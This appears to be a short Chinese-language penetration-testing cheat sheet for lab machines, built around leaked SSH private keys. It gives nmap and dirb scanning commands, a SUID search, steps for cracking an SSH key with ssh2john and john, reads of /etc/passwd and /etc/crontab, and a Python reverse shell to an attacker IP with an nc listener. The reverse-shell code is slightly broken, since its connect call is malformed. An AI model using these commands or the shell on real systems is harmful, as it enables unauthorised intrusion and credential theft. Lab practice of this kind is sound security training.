SSH私钥泄露
信息探测
对于只是给定一个对应IP地址的靶场机器,我们需要对其进行扫描,探测开放的服务。渗透其实是针对服务的漏洞探测,然后进行相应的数据包发送,获取机器的最高权限。
1 2 3 4 5 6
| #挖掘开放服务信息 nmap -sV ip #探测靶场全部信息 nmap -A -v ip #探测靶场的操作系统类型与版本 nmap -O ip
|
1 2
| #探测服务的隐藏文件 dirb http://ip:port
|
1 2
| #查找具有root权限的文件 find /-perm -4000 2 > /dev/null
|
1 2 3 4 5 6 7 8
| #通过ssh私钥登录 ssh -i id_rsa user@ip #解密ssh密钥信息 chmod 600 id_isa #转换ssh ssh2john id_isa > isacrack #利用字典解密 zcat ./rockyou.txt.gz | john --pipe --rule isacrack
|
1 2 3 4 5 6 7 8
| #查看所有用户的列表 cat /etc/passwd #查看用户组 cat /etc/group #查看属于某些用户的文件 find / -user username #查看缓冲文件目录 /tmp
|
1 2
| #挖掘定时任务 cat /etc/crontab
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| #反弹shell #!/usr/bin/python import os, subprocess, socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect("攻击机IP", "攻击机监听端口") os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) p = subprocess.call(["/bin/sh", "-i"])
#攻击机netcat命令 nc -lpv port #查看占用端口 netstat -pantu
|